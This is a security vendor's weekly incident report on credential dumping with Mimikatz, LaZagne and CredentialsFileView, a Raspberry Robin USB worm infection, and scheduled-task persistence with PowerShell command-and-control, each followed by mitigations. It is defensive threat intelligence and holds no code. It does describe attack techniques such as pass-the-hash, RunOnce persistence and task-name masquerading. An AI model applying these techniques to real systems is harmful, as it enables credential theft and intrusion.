Between March 27 and April 3, 2024, Blackpoint’s Security Operations Center (SOC) responded to 156 total incidents. These incidents included 9 on-premises MDR incidents, 2 Cloud Response for Google Workspace, and 145 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:
- Mimikatz, LaZagne, and CredentialsFileView all running under the name of legitimate security tool “Automim,”
- Raspberry Robin malware deployed via USB drive for initial access, and
- Malicious JavaScript file via a scheduled task for execution, persistence, and command and control (C2) communication using PowerShell.
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if you’ve not been attacked yet! – as well as possible mitigations by leveraging your current tech stack and Blackpoint’s Active Cybersecurity.
Mimikatz, LaZagne, CredentialsFileView Incident with Legal Services End Client on March 31, 2024
Topline Takeaways
- Industry target: Legal Services
- Attacker information:
- Mimikatz abuse
- LaZagne abuse
- CredentialsFileView abuse
- Impacted partner systems:
- Microsoft Windows Defender
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to abuse Mimikatz, LaZagne, and CredentialsFileView to exploit other legal services organizations over the next 12 months.
- Recommended remediations and mitigations:
- Least-privilege access controls
- Heuristics-based activity monitoring and remediation
- Multifactor authentication (MFA)
Mimikatz, LaZagne, and CredentialsFileView Incident Timeline for March 31, 2024
- 12:26 a.m. ET: Blackpoint’s MDR alerted to malicious tools running on a legal services end client’s machine.
- 12:26 a.m. ET: An MDR analyst began initial triage and investigation, as the observed “user” was also running multiple commands to disable Microsoft Defender before executing malicious tools.
- 12:27 a.m. ET: The analyst escalated the incident to senior SOC leadership for further investigation, during which the malicious tools were identified as Mimikatz, LaZagne, and CredentialsFileView running under “Automim” – a known security tool used to simulate attacks.
- 12:28 a.m. ET: The senior MDR analyst isolated the impacted endpoint from all external and internal communications.
- 12:32 a.m. ET: The SOC made contact with the end client’s MSP about the incident, providing additional remediation advice.
More About Mimikatz, LaZagne, and CredentialsFileView
Mimikatz
Mimikatz (1) is an open source application that allows users to view and save authentication credentials, including Kerberos tickets.
Mimikatz is a legitimate credential harvester used by system administrators and penetration testers for Windows operating systems (OSs). An attacker can abuse Mimikatz to execute multiple credential gathering techniques, including:
- Pass-the-hash attacks
- Pass-the-ticket attacks
- Pass-the-key attacks
- Kerberoasting
- Pass-the-cache attacks
LaZagne
LaZagne (2) is an open source credentials recovery tool that can be used to extract passwords from various software and OSs – including Windows, Linux, and macOS. The project supports:
- Internet browsers,
- Messaging applications,
- Databases,
- Games,
- Email software, and other media formats.
The tool is written in Python and is customizable – which makes it a flexible tool capable of targeting the latest applications and platforms. In a threat actor’s hands, LaZagne is capable of multiple credential gathering/access techniques, including:
- Brute force attacks
- Dictionary attacks
- Keychain extraction
Additionally, the tool extracts passwords stored locally, providing a decrypted list for the user – or in this case, the attacker masquerading as a user.
CredentialsFileView
CredentialsFileView (3) is an attacker tool that targets Windows OSs to decrypt and display passwords and other data stored in system credential files, as well as data stored on external drives.
Unlike Mimikatz and LaZagne, CredentialsFileView does not require installation processes or dynamic link libraries (DLL); the user only needs to run the executable “CredentialsFileView.exe.”
APG Threat Analysis of Mimikatz, LaZagne, and CredentialsFileView Abuse for 2024
The APG predicts that threat actors will likely continue to abuse all three software tools – Mimikatz, LaZagne, and CredentialsFileView – over the next 12 months.
We base this assessment on observed threat actor activity abusing legitimate tools for a technique known as “living off the land” (LotL) (4).
All three listed tools – especially Mimikatz – are legitimate software and system tools that threat actors have co-opted for unauthorized credential access.
In fact, the APG is actively tracking legitimate tool abuse by threat actors in publicly known attacks, particularly:
- Mimikatz, with 18 ransomware groups and 43 threat groups (5); and
- LaZagne, with 6 ransomware groups and 10 threat groups (6).
As for CredentialsFileView abuse, Dharma ransomware operators were observed in 2020 using CredentialsFileView for credential access during a ransomware attack (7). The observed behavior matched how the would-be attackers were leveraging CredentialsFileView against Blackpoint’s partner, though our SOC isolated the impacted devices well before any sort of lateral movement or compromise occurred.
Recommended Mimikatz, LaZagne, and CredentialsFileView Abuse Mitigations and Remediations
Blackpoint APG recommends the following actions to help mitigate the abuse of legitimate credential harvesting tools by threat actors:
- Implement the practice of least privilege access controls. These controls limit end users’ access to organizational files, data, applications and abilities to only those who need them for their jobs within the organization.
- These access controls help ensure that even if a single endpoint or user profile is compromised through abused credential harvesting tools like the ones used in this incident, the threat actor’s capabilities are limited to only the compromised credential’s permissions.
- Heuristics-based activity monitoring and remediation that activates based on unusual or potentially malicious user or endpoint activity, rather than relaying on static indicators of compromise (IoCs) alone.
- When threat actors abuse legitimate tools, traditional firewalls or EDRs may not alert to the threat actor’s presence within a given endpoint or system. However, by triggering alerts based on malicious activity – no matter which tool they choose to use or abuse! – threat actors can be caught more quickly and before a material breach occurs.
- Ensure employees are using MFA while on organization applications or databases, but especially when they must access sensitive data and resources.
- While the credential harvesting tools used in this incident may decrypt user secrets and credentials, they cannot uncover every form of authentication used as part of MFA access control configurations. A would-be compromised user will get a notification to confirm their identity they did not request – alerting them to their compromised credentials – or otherwise stop an attacker entirely if they cannot trick or spoof the other forms of authentication required for access.
Raspberry Robin Incident with Basic Materials End Client on March 31, 2024
Topline Takeaways
- Industry target: Basic Materials
- Attacker information:
- Rasberry Robin
- USB drive
- Impacted partner systems:
- Microsoft Defender for Endpoint
- Threat assessment for partners:
- The APG predicts that it is very likely that threat actors will continue to use Raspberry Robin to exploit other basic materials organizations over the next 12 months.
- Recommended remediations and mitigations:
- Environment segmentation
- Employee security training
- Controls preventing unauthorized use of legitimate tools and/or allowlisted applications
Raspberry Robin Malware Incident Timeline for March 31, 2024
- 11:55 a.m. ET: Blackpoint’s MDR alerted to a suspicious USB drive on the host of a basic material’s partner.
- 11:58 a.m. ET: An MDR analyst began initial triage and investigation, during which the suspicious USB drive issued commands to the command prompt of the now-infected machine.
- 11:59 a.m. ET: The analyst escalated the incident to senior SOC leadership for further investigation of the commands, which indicated Raspberry Robin malware.
- 11:59 a.m. ET: The senior MDR analyst isolated the impacted endpoint from all external and internal communications.
- 12 p.m. ET: The SOC made contact with the basic material end client’s MSP about the incident, and offered additional remediation advice.
More About Raspberry Robin Malware
Raspberry Robin is a worm malware that was first identified in 2021 (8), able to spread itself through a network, most often with the use of infected USB drives.
The group behind the Raspberry Robin worm acts as an initial access broker (IAB) to other malware and threat groups, using their worm feature for lateral movement from the initial intrusion to other endpoints prior to deploying additional malicious payloads.
Researchers previously observed Raspberry Robin gaining persistence on a network by adding itself to the RunOnce key in the CurrentUser registry hive of the user who executed the malware, as well as the use of msiexec.exe to install a malicious DLL file. (8)
APG Threat Analysis of Raspberry Robin Malware for 2024
The APG predicts that threat actors will very likely continue to use Raspberry Robin over the next 12 months.
We base this assessment in part on our observed popularity of Raspberry Robin as a common lateral movement and persistence tool of choice among threat actors.
In August 2023, for example, researchers found Raspberry Robin as the third most popular loader malware observed in the first half of 2023, accounting for 23% of observed incidents (9).
Raspberry Robin malware is also flexible in its ransomware variant deployments – including also-popular CL0P and LockBit – and other malware – including TrueBot and FlawedGrace.
Finally, in February 2024, the Raspberry Robin malware was reportedly updated with a new delivery method (10), now disguising itself as a legitimate Windows component and exploiting newly disclosed “one day” vulnerabiltiies (as opposed to “zero-day” vulnerabilities) to gain access to victim environments.
Recommended Raspberry Robin Mitigations and Remediations
The APG recommends the following actions to help mitigate Raspberry Robin malware.
- Conduct employee security awareness training to ensure employees are aware of the risks of rogue USB devices.
- The initial intrusion vector for this partner’s Raspberry Robin incident was an infected removable memory device. While the context of behind why the user chose to plug in this device to their monitored endpoint, additional training could have helped the user think twice before using not-official removable memory media in their organization-assigned laptop or PC.
- Segment critical systems, so they are isolated from less secure areas while preventing unauthorized communication between segments.
- By separating your organization’s environment to specific groups of endpoints, applications, and users, threat actors using malware such as Raspberry Robin will find themselves unable to spread laterally to more desirable areas of a victim’s environment – and with fewer ways to persist within the infected environment once discovered.
- Employ access controls that restrict end users’ removable memory access, to reduce the opportunity for malicious USB drives or other media to execute their payloads.
- If the user’s environment had had controls in place that prevented the reading of removable memory devices like USB drives, then the Raspberry Robin malware could never have deployed at all!
Scheduled Task Abuse Incident with Healthcare End Client on April 2, 2024
Topline Takeaways
- Industry target: Healthcare
- Attacker information:
- Scheduled task “Firefox as the Default Browser Agent”
- “Chase_Bank_Statement_March[.]zip”
- Impacted partner systems:
- PowerShell
- Threat assessment for partners:
- The APG predicts that it is almost certainly that threat actors will continue to use Scheduled Task Abuse to exploit other healthcare organizations over the next 12 months.
- Recommended remediations and mitigations:
- Improve endpoint, asset, and network visibility
- Use a content proxy
- Scripting language controls
Scheduled Task “Firefox as the Default Browser Agent” Incident Timeline for April 2, 2024
- 3:32 p.m. ET: Blackpoint’s MDR alerted to a process violation of a JavaScript file via wscript.exe through a Scheduled Task, taking place on a healthcare end client’s endpoint.
- 4:38 p.m. ET: An MDR analyst began initial triage and investigation, as the endpoint’s Scheduled Tasks executed a new task called “FireFox as the Default Browser Agent” to run malicious files while the attacker abused the infected endpoint’s PowerShell feature to connect with a C2 server with a Dutch IP address.
- 4:39 p.m. ET: The analyst isolated the impacted endpoint from all external and internal communications.
- 4:50 p.m. ET: The SOC made contact with the healthcare end client’s MSP about the incident, and offered additional remediation advice.
More About Scheduled Task Abuse
The Scheduled Tasks function on Microsoft endpoints allow users – often developers and system administrators – to automatically perform routine tasks on a chosen device (11).
The Task Scheduler application in Windows OS allows the user to choose when a task is executed. These automation triggers can include a specific time, when an action occurs, or when a user logs in.
Scheduled tasks are not frequently used by most users of Microsoft Windows OS, as it requires a user to access their machine’s control panel and administrative tools to schedule and run the needed script and functionality.
Many organizations managing Windows OS endpoints will keep the Task Scheduler available to end users – even when they don’t know or use the functionality! – for the convenience of their more technical users and system admins.
However, threat actors are more technical than the average Windows user, and are more than capable of both accessing and running malicious tasks through a compromised endpoint’s Task Scheduler without a user knowing something is wrong.
APG Threat Analysis of Scheduled Task Abuse for 2024
The APG predicts that threat actors will almost certainly continue to abuse scheduled tasks over the next 12 months.
We base this assessment on the sheer volume of recorded and observed incidents – both within Blackpoint partner environments and in other researchers’ findings – in which scheduled tasks used by threat actors of all kinds, including advanced persistent threat (APT) and cybercriminal groups.
Threat actors seem to run scheduled tasks specifically to establish persistence on a compromised endpoint. Task Scheduler allows threat actors to automatically run malware in a way that blends into the environment, since many legitimate and allowlisted Windows applications also use scheduled tasks for automated deployments.
In 2022, for example, Microsoft security researchers observed the threat group HAFNIUM (also known as “Silk Typhoon” and “Red Dev 13”) using the Tarrask malware to create and remove “hidden” scheduled tasks defense evasion during cyberattacks (12).
Threat actors will even go so far as to name their scheduled tasks the names of common, allowlisted applications or processes – “Firefox”, for this specific incident – in order to blend in with normal endpoint activities and further evade detection.
On last week’s SOC incident analysis, the SOC thwarted a Gootloader malware incident, during which MDR analysts observed the use of a similar malicious attachment name (“chase_statement_Jan_2024[.]zip”) and a similar scheduled task name (“Firefox Default Browser Agent”) to this week’s incident.
While this week’s specific incident is not confirmed to be a prelude to a Gootloader installation, the APG believes it is likely that these scheduled tasks and malicious attachment names are related to last week’s Gootloader incident, at the very least.
Recommended Scheduled Task Abuse Mitigations and Remediations
The APG recommends the following actions to help mitigate malicious use of scheduled tasks on Windows OS devices and systems.
- Improve endpoint, asset, and overall environment visibility to monitor remote systems and endpoints.
- Active monitoring of on-device management clients can aid in detecting and isolating malicious activity conducted by Gootloader and other malware on managed endpoints.
- Implement behavioral monitoring to detect unusual patterns that could indicate malicious behavior by threat actors.
- As we’ve covered previously, threat actors abuse allowlisted applications and processes to spread malware and evade detection by more traditional security tools operating primarily from known IoCs. Heuristics-based alerting allows security teams to detect even brand-new malware or abuses… even if it’s a slightly different file name than has been previously seen, as our SOC analysts alerted to the new malicious file that was almost-but-not-quite a copy of last week’s.
- Eliminate scripting language use within your managed environment – or at the very least, implement very strong controls on its use!
- Most end users have no reason to access scripting applications such as Task Scheduler, or to run Javascript files on their endpoints. Cut off one of an attacker’s main persistence tools by severely limiting your end users’ access to these tools!
- Use a content proxy to monitor internet use and restrict user access to suspicious or risky websites.
- The malicious files seen in these incidents appear on the surface to be safe, particularly with known-good sources such as “Chase” or “Firefox Default” in the file name. The average end user – or even a rushed IT professional! – might authorize a malware script to load and deploy, thinking it’s okay. However, content proxies can help mitigate this simple human error, as it examines the source and location of the file – not the easily changed file name – to determine if the file truly is legitimate… or another Gootloader malware in disguise.
Further Information and Resources
- GitHub’s Repository: “mimikatz” by gentilkiwi on 2024-01-05
- GitHub’s Repository: “LaZagne” by Alessandro on 2023-11-13
- NirSoft’s Blog: “CredentialsFileView v1.12” by NirSoft on 2023
- MSSP Alert’s News: “Right of Boom: Day 2, Live Blog” by Jessica C. Davis on March 8, 2024
- MITRE’s Blog: “Mimikatz” by MITRE on 2023-07-27
- MITRE’s Blog: “LaZagne” by MITRE on 2023-08-03
- CrowdStrike’s Blog: “Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques” by Eric Loui, Karl Scheuerman, Aaron Pickett, and Brendon Feeley on 2020-04-16
- Red Canary’s Blog: Raspberry Robin by “Red Canary” on 2024-03-12
- ReliaQuest’s Blog: “3 Malware Loaders You Can’t (Shouldn’t) Ignore” by RELIAQUEST THREAT RESEARCH TEAM on 2023-08-25
- Check Point’s Blog: “RASPBERRY ROBIN KEEPS RIDING THE WAVE OF ENDLESS 1-DAYS” by Check Point Research on 2024-02-07
- Microsoft’s Blog: “Task Scheduler for developers” by Microsoft on 2023-02-08
- Microsoft’s Blog: “Tarrask malware uses scheduled tasks for defense evasion” by Microsoft Incident Response, Microsoft Threat Intelligence on 2022-04-12